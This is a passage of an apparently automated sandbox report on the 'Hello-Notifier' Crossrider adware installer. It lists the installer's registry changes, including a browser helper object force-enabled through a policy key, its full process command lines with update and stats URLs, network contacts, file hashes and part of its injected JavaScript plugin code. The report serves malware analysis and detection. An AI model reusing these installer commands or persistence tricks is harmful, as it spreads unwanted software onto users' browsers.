value;};appAPI.internal.prefs.getInt=function(key,section){return parseInt(appAPI.internal.prefs.getChar(key,section));};appAPI.internal.prefs.setInt=function(value,key,section){return $.setIntPref(value,key,section);};appAPI.internal.prefs.setChar=function(value,key,section){return $.setCharPref(value,key,section);};appAPI.internal.prefs.getChildValueNames=function(section){var commaSeperatedList=$.getChildValueNames(section);var valueNamesArray=commaSeperatedList.split(\",\");return valueNamesArray;};appAPI.internal.prefs.getChildKeys=function(section){if(typeof $.getChildKeys===\"undefined\"){return;}var commaSeperatedList=$.getChildKeys(section);var valueNamesArray=commaSeperatedList.split(\",\");return valueNamesArray;};if(typeof appAPI.internal.debug===\"undefined\"){appAPI.internal.debug={};}appAPI.internal.debug.getDebugUrl=function(){var appCodeUrl=appAPI.internal.prefs.getChar(\"DebuggedAppUrl\",\"Debug\");var bgCodeUrl=appAPI.internal.prefs.getChar(\"DebuggedBgUrl\",\"Debug\");var res={userCode:appCodeUrl,backgroundCode:bgCodeUrl};return res;};appAPI.internal.debug.isDebugMode=function(){return(appAPI.internal.prefs.getChar(\"IsDebugMode\",\"Debug\")==\"1\");};appAPI.internal.debug.turnOn=function(debugUrls){if(typeof debugUrls===\"undefined\"||debugUrls===null){return false;}if(typeof debugUrls.userCode!==\"string\"){return false;}if(typeof debugUrls.backgroundCode!==\"string\"){return false;}appAPI.internal.prefs.setInt(\"IsDebugMode\",1,\"Debug\");appAPI.internal.prefs.setChar(\"DebuggedAppUrl\",debugUrls.userCode,\"Debug\");appAPI.internal.prefs.setChar(\"DebuggedBgUrl\",debugUrls.backgroundCode,\"Debug\");if(typeof $.reloadBg!==\"undefined\"){$.reloadBg();}return true;};appAPI.internal.debug.turnOff=function(){$.setIntPref(\"IsDebugMode\",0,\"Debug\");};appAPI.internal.reloadBackground=function(){if(typeof $.reloadBg===\"undefined\"){return false;}$.reloadBg();return true;};appAPI.internal.console=function(text,level){msgToSend={text:text,level:level};appAPI.internal.message.send({eventName:\"externalConsole\",eventContent:msgToSend});};appAPI.internal.console.log=function(text){appAPI.internal.console(text,\"log\");};appAPI.internal.console.info=function(text){appAPI.internal.console(text,\"info\");};appAPI.internal.console.warn=function(text){appAPI.internal.console(text,\"warn\");};appAPI.internal.console.error=function(text){appAPI.internal.console(text,\"error\");};appAPI.internal.log=function(str){$.log(str);};appAPI.internal.forceUpdate=function(){$.forceUpdate();};appAPI.internal.globalEval=function(js){if(typeof $.eval===\"undefined\"){console.error(\"appAPI.internal.globalEval is not supported\");return false;}if(typeof js!==\"string\"){console.error(\"appAPI.internal.globalEval expected a string as the 1st parameter and got: \"+typeof js);return false;}$.eval(js);return true;};if(typeof $.isIframe!==\"undefined\"){if(typeof appAPI.dom===\"undefined\"){appAPI.dom={};}appAPI.dom.isIframe=function(){return $.isIframe();};}appAPI.internal.getIsAddressBarShowing=function(){if(typeof $.isAddressBarShowing!==\"undefined\"){return $.isAddressBarShowing();}return false;};appAPI.internal.userCode={};appAPI.internal.userCode.getExtension=function(callback){setTimeout(function(){callback(appAPI.internal.prefs.getChar(\"AppJavaScript\",\"Code\"));},10);};appAPI.internal.userCode.getBackground=function(callback){setTimeout(function(){callback(appAPI.internal.prefs.getChar(\"BgJavaScript\",\"Code\"));},10);};appAPI.internal.plugins={};appAPI.internal.plugins.getOrder=function(target,callback){if(target===0){target=\"BgPluginList\";}else{if(target===1){target=\"AppPluginList\";}else{if(target===5){target=\"PopupPluginList\";}else{return;}}}var pluginsListIds=appAPI.internal.prefs.getChar(target,\"Plugins\");if(pluginsListIds){pluginsListIds=pluginsListIds.split(\",\");}var pluginsList=[];for(i=0;i<pluginsListIds.length;i++){var name=appAPI.internal.prefs.getChar(\"Name\",\"Plugins\\\\\"+pluginsListIds[i]);var url=appAPI.internal.prefs.getChar(\"Url\",\"Plugins\\\\\"+pluginsListIds[i]);var ver=appAPI.internal.prefs.getInt(\"Version\",\"Plugins\\\\\"+pluginsListIds[i]);pluginsList.push({id:pluginsListIds[i],name:name,url:url,ver:ver});}setTimeout(function(){callback(pluginsList);},10);};appAPI.internal.plugins.getInfo=function(pluginId,callback){var name=appAPI.internal.prefs.getChar(\"Name\",\"Plugins\\\\\"+pluginId);var url=appAPI.internal.prefs.getChar(\"Url\",\"Plugins\\\\\"+pluginId);var ver=appAPI.internal.prefs.getInt(\"Version\",\"Plugins\\\\\"+pluginId);setTimeout(function(){callback({name:name,ver:ver,id:pluginId});},10);};appAPI.internal.plugins.getCode=function(plugin,callback){var code=appAPI.internal.prefs.getChar(\"JavaScript\",\"Plugins\\\\\"+plugin.id);setTimeout(function(){callback(code);},10);};})(appAPIinternal);\n//------------------ PLUGIN IEInternal END ------------------\n" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\4 | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CrossriderApp0037928.BHO\ = "CrossriderApp0037928" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{11111111-1111-1111-1111-110311791128}\TypeLib\ = "{44444444-4444-4444-4444-440344794428}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\OnRequestPluginList = "14,42,41,39,38,43,45,64,72" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\ActiveAppId = "37928" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Manifest\Name = "Hello-Notifier" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\102 | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\7\Version = "2" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\22\Name = "resources" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{44444444-4444-4444-4444-440344794428}\1.0\ = "CrossriderApp0037928 Type Library" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{22222222-2222-2222-2222-220322792228} | C:\Windows\system32\regsvr32.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-firefoxinstaller.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-firefoxinstaller.exe | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID\{11111111-1111-1111-1111-110311791128} = "1" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\1999c56ab4a4e37c0c4b35f1a859926b1a5c082a12167106de4f955de3f83d25N.exe
"C:\Users\Admin\AppData\Local\Temp\1999c56ab4a4e37c0c4b35f1a859926b1a5c082a12167106de4f955de3f83d25N.exe"
C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe
"C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe"
C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-firefoxinstaller.exe
"C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-firefoxinstaller.exe" /installxpi /agentregpath='Hello-Notifier' /extensionfilepath='C:\Program Files (x86)\Hello-Notifier\37928.xpi' /appid=37928 /srcid='000249' /subid='0' /zdata='0' /bic=0CC34B9305CC4362B008DD8A4336894AIE /verifier=bf3eda078706ebe98e31a33824224eec /installerversion=1_34_1_29 /installerfullversion=1.34.1.29 /installationtime=1729894738 /statsdomain=http://stats.srvstatsdata.com /errorsdomain=http://errors.srvstatsdata.com /waitforbrowser=300 /extensionid=b2c81c06-4b2f-4808-b3ab-ef6f49041f37@f562099a-8022-43b2-aad5-98abd7b264a4.com /extensionversion=0.93 /prefsbranch=ab2c81c064b2f4808b3abef6f49041f37f562099a802243b2aad598abd7b264a4com37928 /updateurl=https://w9u6a2p6.ssl.hwcdn.net/plugin/ff/update/37928.rdf /extensionname='Hello-Notifier' /extensiondesc='Hello Notifier extention' /publishername='Hello-Notifier' /defbro=ie /allusers /allprofiles /checkfflist /autoupdateulr='http://update.srvstatsdata.com/ff_agent_updates/{CAMP_ID}/update.json' /showthankyoupage /runfrom='installer' /externallog='C:\Users\Admin\AppData\Local\Temp\Hello-NotifierInstaller_1729894738.log'
C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe
"C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe" /installapp /agentregpath='Hello-Notifier' /appid=37928 /srcid='000249' /subid='0' /zdata='0' /bic=0CC34B9305CC4362B008DD8A4336894AIE /verifier=bf3eda078706ebe98e31a33824224eec /installerversion=1_34_1_29 /installerfullversion=1.34.1.29 /installationtime=1729894738 /statsdomain=http://stats.srvstatsdata.com /errorsdomain=http://errors.srvstatsdata.com /codedownloaddomain=http://app-static.crossrider.com /defbro=ie /allusers /runfrom=installer /externallog='C:\Users\Admin\AppData\Local\Temp\Hello-NotifierInstaller_1729894738.log' /downloadfromlocalpath='file://C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\extensionData'
C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe
"C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe" /updateapp /dontsenddaily /agentregpath='Hello-Notifier' /appid=37928 /srcid='000249' /subid='0' /zdata='0' /bic=0CC34B9305CC4362B008DD8A4336894AIE /verifier=bf3eda078706ebe98e31a33824224eec /installerversion=1_34_1_29 /installerfullversion=1.34.1.29 /installationtime=1729894738 /statsdomain=http://stats.srvstatsdata.com /errorsdomain=http://errors.srvstatsdata.com /codedownloaddomain=http://app-static.crossrider.com /defbro=ie /allusers /runfrom=installer-update /externallog='C:\Users\Admin\AppData\Local\Temp\Hello-NotifierInstaller_1729894738.log'
C:\Windows\SysWOW64\regsvr32.exe
regsvr32 /s "C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bho.dll"
C:\Windows\SysWOW64\regsvr32.exe
regsvr32 /s "C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bho64.dll"
C:\Windows\system32\regsvr32.exe
/s "C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bho64.dll"
C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bg.exe
"C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bg.exe" /executebg /externallog='C:\Users\Admin\AppData\Local\Temp\Hello-NotifierInstaller_1729894738.log'
C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe
"C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe" /enablebho /agentregpath='Hello-Notifier' /appid=37928 /srcid='000249' /subid='0' /zdata='0' /bic=0CC34B9305CC4362B008DD8A4336894AIE /verifier=bf3eda078706ebe98e31a33824224eec /installerversion=1_34_1_29 /installationtime=1729894738 /statsdomain=http://stats.srvstatsdata.com /errorsdomain=http://errors.srvstatsdata.com /bhoguid=11111111-1111-1111-1111-110311791128 /defbro=ie /allusers /autoupdateulr='http://update.srvstatsdata.com/ie_enable_agent_updates/{CAMP_ID}/update.json' /runfrom='installer' /externallog='C:\Users\Admin\AppData\Local\Temp\Hello-NotifierInstaller_1729894738.log'
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.27.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | errors.srvstatsdata.com | udp |
| SG | 13.251.16.150:80 | errors.srvstatsdata.com | tcp |
| US | 8.8.8.8:53 | 150.16.251.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | update.srvstatsdata.com | udp |
| US | 8.8.8.8:53 | 69.209.201.84.in-addr.arpa | udp |
| SG | 13.251.16.150:80 | update.srvstatsdata.com | tcp |
| SG | 13.251.16.150:80 | update.srvstatsdata.com | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | stats.srvstatsdata.com | udp |
| SG | 13.251.16.150:80 | stats.srvstatsdata.com | tcp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | stats.mstatsserv.com | udp |
| SG | 13.251.16.150:80 | stats.srvstatsdata.com | tcp |
| SG | 13.251.16.150:80 | stats.srvstatsdata.com | tcp |
| SG | 13.251.16.150:80 | stats.srvstatsdata.com | tcp |
| US | 8.8.8.8:53 | app-static.crossrider.com | udp |
| SG | 13.251.16.150:80 | stats.srvstatsdata.com | tcp |
| SG | 13.251.16.150:80 | stats.srvstatsdata.com | tcp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| SG | 13.251.16.150:80 | stats.srvstatsdata.com | tcp |
| SG | 13.251.16.150:80 | stats.srvstatsdata.com | tcp |
| US | 8.8.8.8:53 | stats.mstatsserv.com | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.108.222.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\System.dll
| MD5 | 00a0194c20ee912257df53bfe258ee4a |
| SHA1 | d7b4e319bc5119024690dc8230b9cc919b1b86b2 |
| SHA256 | dc4da2ccadb11099076926b02764b2b44ad8f97cd32337421a4cc21a3f5448f3 |
| SHA512 | 3b38a2c17996c3b77ebf7b858a6c37415615e756792132878d8eddbd13cb06710b7da0e8b58104768f8e475fc93e8b44b3b1ab6f70ddf52edee111aaf5ef5667 |
C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\WrapperUtils.dll
| MD5 | 7a18f06f0935a9e98a14d47d77064573 |
| SHA1 | 58b12858557fb39cf876b6e76e585cf581b53590 |
| SHA256 | 422a61da2bedfdc8167cb022b4b5e0ff8588dc1e6bd40b3c4ba97588836f1b0f |
| SHA512 | 356fa81d066db57054d5477e96d12ca9a5e9639731c06d61dc320dc52bf6054f603523e2da3751a96a4608dc19c20868ed3573ccdf3d32bef025035770a434e6 |
C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\StdUtils.dll
| MD5 | 21010df9bc37daffcc0b5ae190381d85 |
| SHA1 | a8ba022aafc1233894db29e40e569dfc8b280eb9 |
| SHA256 | 0ebd62de633fa108cf18139be6778fa560680f9f8a755e41c6ab544ab8db5c16 |
| SHA512 | 95d3dbba6eac144260d5fcc7fcd5fb3afcb59ae62bd2eafc5a1d2190e9b44f8e125290d62fef82ad8799d0072997c57b2fa8a643aba554d0a82bbd3f8eb1403e |
C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe
| MD5 | a4c3e2148c1e6f2298ca76e998d32efb |
| SHA1 | 309b580cf1386e24eba522c79c4d7ce2d1fd84a9 |
| SHA256 | 7f0141ce147904a3c0debd19f46cb1111ce6315459b34b34b5039ed670862cd4 |
| SHA512 | 234578790ff105eb7dde8ce6b785fbbd413a11aec85d6231bd4307ba229844eddb6060c7b5cc7ac545f901a8651966b02f350cb26fcc08c1dc7e0309455e5fc1 |
C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\nsislog.dll
| MD5 | e47100b70748fc790ffe6299cdf7ef2d |
| SHA1 | ad2a9cd5f7c39121926b7c131816e7ba85aeead2 |
| SHA256 | 271d539fe130276189e0a32b8a0bc9f08f2d92f7e17f85d88726735f14ea6144 |
| SHA512 | 88452a9aeff453e7979df9240ab396cbc0c5d00efecda97df1e46f2ba1e9b5bfd990921e85d503beb4b35a1de7681390ba124eeeaf896f250717892ced133e93 |
memory/3788-36-0x0000000002430000-0x0000000002440000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\InstallerUtils2.dll
| MD5 | 8c17aa401cdc9bfe61b57f4d4bfec362 |
| SHA1 | 8c580457b636bc30bedb476cebb9a50d9f02651d |
| SHA256 | dfc863b01224a8d3bf35ef6064d6051aab295b9618db72647202f9ca97e45d19 |
| SHA512 | 9fa29aab6cde651a0afb8cacf3dc2ee063b4351c7cf16c49668b2b59062914dbe53c93368e7b2a73a267c4d3eddd513fe7ac282422cf06397d2ad8839c3cd881 |
C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\nsisos.dll
| MD5 | 69806691d649ef1c8703fd9e29231d44 |
| SHA1 | e2193fcf5b4863605eec2a5eb17bf84c7ac00166 |
| SHA256 | ba79ab7f63f02ed5d5d46b82b11d97dac5b7ef7e9b9a4df926b43ceac18483b6 |
| SHA512 | 5e5e0319e701d15134a01cb6472c624e271e99891058aef4dfe779c29c73899771a5b6f8b1cd61b543a3b3defeaecaa080c9cc4e76e84038ca08e12084f128eb |
C:\Users\Admin\AppData\Local\Temp\Hello-NotifierInstaller_1729894738.log
| MD5 | ce14bd5475369423463ca07da9e13db4 |
| SHA1 | 810fef89a7b7b04a0c5f34760f4116cc4f805717 |
| SHA256 | c3a1e1b4cb77a85df726d172284297e1d7e00a93395c966dbad6635cb529dbb9 |
| SHA512 | b4cfcb51485b0427ade131e1c5888cd56df2cef904750410e796b0c0ece74454ed82aee2401778a7618c1784d49cdc89dd5ee67d4cdf481a6430ecf6e94fa3f0 |
memory/3788-315-0x0000000002430000-0x0000000002439000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\md5dll.dll
| MD5 | 0745ff646f5af1f1cdd784c06f40fce9 |
| SHA1 | bf7eba06020d7154ce4e35f696bec6e6c966287f |
| SHA256 | fbed2f1160469f42ce97c33ad558201b2b43e3020257f9b2259e3ce295317a70 |
| SHA512 | 8d31627c719e788b5d0f5f34d4cb175989eaa35aa3335c98f2ba7902c8ae01b23de3ccb9c6eb95945f0b08ef74d456f9f22ca7539df303e1df3f6a7e67b358da |
C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\InstallerUtils.dll
| MD5 | 895bc798fb0d31e5d3e584ae5701925b |
| SHA1 | d5184d234c1768d3fe671be1512bb58688b37698 |
| SHA256 | 050bcec7226cfe81328bd44de1091355d368f1e9183d232eef1f598ffbd3bc99 |
| SHA512 | b0b0a108f8c21e4f9420245646c546293ea1138580d47dae35b2e467bb2752d7c2cc9df490fdac9e2596acc258dfaa13df8bbf98d45c9f7d77418ac7fdf5cf7b |
memory/3788-356-0x0000000004120000-0x0000000004130000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\UserInfo.dll
| MD5 | 7579ade7ae1747a31960a228ce02e666 |
| SHA1 | 8ec8571a296737e819dcf86353a43fcf8ec63351 |
| SHA256 | 564c80dec62d76c53497c40094db360ff8a36e0dc1bda8383d0f9583138997f5 |
| SHA512 | a88bc56e938374c333b0e33cb72951635b5d5a98b9cb2d6785073cbcad23bf4c0f9f69d3b7e87b46c76eb03ced9bb786844ce87656a9e3df4ca24acf43d7a05b |
C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\inetc.dll
| MD5 | 4c01fdfd2b57b32046b3b3635a4f4df8 |
| SHA1 | e0af8e418cbe2b2783b5de93279a3b5dcb73490e |
| SHA256 | b98e21645910f82b328f30c644b86c112969b42697e797671647b09eb40ad014 |
| SHA512 | cbd354536e2a970d31ba69024208673b1dc56603ad604ff17c5840b4371958fc22bafd90040ae3fb19ae9c248b2cfce08d0bc73cc93481f02c73b86dbc0697b2 |
memory/3768-427-0x0000000000400000-0x0000000000499000-memory.dmp
memory/3788-428-0x0000000000400000-0x00000000005B6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\temp_file_after.tmp
| MD5 | 064d2a2851c44f039fa89e24672ec065 |
| SHA1 | 2b6a7e3b294a73c63d8d013541bd70617dfb026a |
| SHA256 | f2d61b9b2d422007fc273a93c6718a7d7264e5245fde3d2716d40a63340fdd07 |
| SHA512 | 93dcfc3ee338b98508f784470347789d4cb6a49fb4c2d0d3c28fc924477c577ff506da787ca6b71f79e3eeac85d63bf3ddc3dc6805d95cb22fbde4aceea5d397 |
memory/3788-516-0x0000000004F50000-0x0000000004F60000-memory.dmp
memory/3788-522-0x0000000004F60000-0x0000000004F70000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Hello-NotifierInstaller_1729894738.log
| MD5 | 5b1165ca2b57bcb379a4db800e60d821 |
| SHA1 | fe82f726c47198f95e05c0a4634991e0246b39f4 |
| SHA256 | 2e874618fe401daca2f82e902bb77760a202eb8394ab70cbdc3fd294fe297ecb |
| SHA512 | 8d6080dc0b9a08150a9df1f942f313f6d6f788946a6fb82710bb286dd598ee842f733c25ee939f239213a3213872e1db495958c516cfe18b8ba9df584748e53d |
C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\temp_file_after.tmp
| MD5 | 6d586d990046caa6363e0cfcf654f198 |
| SHA1 | b2bac57dfd1fca1fdfe8c233febcb6486c54fa16 |
| SHA256 | 7dccabfab5396ca85ac6c45ba244d25c58279dbec948cda456355ef32e7ca0a1 |
| SHA512 | 199ea6c9c050c1182736adc04aa6b021a7ebf9afe486fdc551f3bf2191e102fb8e61aefa4d850d6714e24cd3cd109b172bcbd857601513bdcfa1095eea252b68 |
C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\temp_file_after.tmp
| MD5 | 4cf2227b60c543ab53e2e4bc710700f4 |
| SHA1 | c1811d55523373c6144f165f48fec686cd31e7d1 |
| SHA256 | fdd5b3df83a9e8a15114785a58e8c65cbf0c577d2ea124db12646c587daca1cf |
| SHA512 | d862d1d373820d03e6da4b19a4cfaa08c4bf213eec1059c3c08606eea393e31b04b1a135b58ef0e41dd8ac5a1a40777902423e41cfe0a6f02220f72e574caeea |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3yrocb08.Admin\extensions\b2c81c06-4b2f-4808-b3ab-ef6f49041f37@f562099a-8022-43b2-aad5-98abd7b264a4.com\skin\crossrider_statusbar.png
| MD5 | 8b1eb9cb80417ec0022d278a44ab1dc7 |
| SHA1 | c49eb73f79e70b8ed96d91ef62f0bc344e41219a |
| SHA256 | e358d97ba4c51b987fe73ea0ac0f14f9b2375e299f3e859fc37c21ab8b051ee6 |
| SHA512 | 0324f2785d09f04c5be9ee77f1cb80a7afe06d66672baa862f63ec8ac59a2ae58199db91bb28e18409e918b222dcf09269013a270284213473ffa974d842c7d7 |
C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\temp_file_after.tmp
| MD5 | e6d0a9a8cb734bc1f13d57c730e129fa |
| SHA1 | e5065caded5b9f4f7f38a6120d4b84b8aca33bfd |
| SHA256 | f966a16b792a66563a303797075aa68ea471adbd7fcf0c9491604554c7224ee0 |
| SHA512 | 802864ae5a1d50b0ad1e0acd5d922b116d68213c1792e7462fd0f1d314d2cfd1237d970e3e6577507180d6a2af947746a61798264602c19c292f89eaddf84485 |
C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\ExecDos.dll
| MD5 | ebcf9f71d804abab3c2e5ce4c17dc22e |
| SHA1 | 17d13084e75cbfa5fbfdd0025e9a0ee5772ae765 |
| SHA256 | d387b725afbd2a6f9b44999278d21025fae55b391e45f7751b88dfb13511a993 |
| SHA512 | 5576396c2d885c039668d7f401eeee583eb4de39e8497c3aaec32d47f4417a522fe6786c111d50a5fba7570f50e84144ef3a8aea42677d170e79114343c3a4a1 |
C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\temp_file_after.tmp
| MD5 | 333d5ced229832b138268ff54d3ae8c5 |
| SHA1 | 0e1be1479ff70bf2220299618b297932d3426a2a |
| SHA256 | beefa3144e2830a09be1cc8ee3ce6835df5c93708a0b962c8321c3acbad99ac2 |
| SHA512 | 4810791890abe1e95a597b9bfaa9fdf8c6864e880b8cb26be90b858624a33f95972c6cd4272a3ec93578c95a50d0246c043a469774c0b17b17d349c2937e60aa |
C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\temp_file_after.tmp
| MD5 | 0038eee3ef38e361affee24de52d7fa7 |
| SHA1 | 27c0f9557899fbf642a558b26f70890cfca94724 |
| SHA256 | db98f86a332e2dfab8fce26769a2f2631f52aa0ce7c6e15522b202d28358ef28 |
| SHA512 | 1926e9153243182db1f43b3542d3cca07277987632df1ea0bff0f0bcbf499fdec5eda4da4ee1dd003658fcb0fba1ef8f8c01dca0d8c39b196095a4e4197d0be9 |
C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\temp_file_after.tmp
| MD5 | 5d63f77328c34a31259218b0411293b0 |
| SHA1 | fe367236de21f4251831c2f37916134b98841a8a |
| SHA256 | a7a33dd0cc2d9cdc4a0a66630f52621cdf08b2498a0832e491411893804dcf58 |
| SHA512 | 594fe90286f402f5744da0cda0ff770a7df45e46138d592b14ee7bfd2c7ec27dcfc739ed28f8a88f6683d107fbdf2f821cac236d14ca94fd9ce660f5af21f2d0 |
C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\temp_file_after.tmp
| MD5 | 6a6653d172238dec2ff28b8b755e504c |
| SHA1 | eb65446878e74bf5061402aa8e35bb1658cc7d07 |
| SHA256 | edc53b6902099c6716cf3e8bece2fd43faafdd49118f9e5db2b7d7c3caed6bb8 |
| SHA512 | a9f5cda9d7783b516a0830a1ef04fbfd8ba2fe86ec5e9c79c66de37a5df36ef7c62879d6f1aac7fda452bf9d4f75dabdac0bc58e6a2d8888f89ace41f7ae1c58 |
C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\temp_file_after.tmp
| MD5 | 77d5b0d8c2009f6bc8798a8d1001c6ec |
| SHA1 | 42b423e5358d59dd9e931411e6b5ac5b54bb2b95 |
| SHA256 | 3a13144df92f8922461e2cb47f912811123883c7bfcb04dcbf085a85b4216c19 |
